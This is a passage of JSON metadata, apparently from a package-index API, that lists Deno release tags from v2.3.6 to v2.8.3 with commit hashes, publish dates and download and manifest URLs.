,"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"depende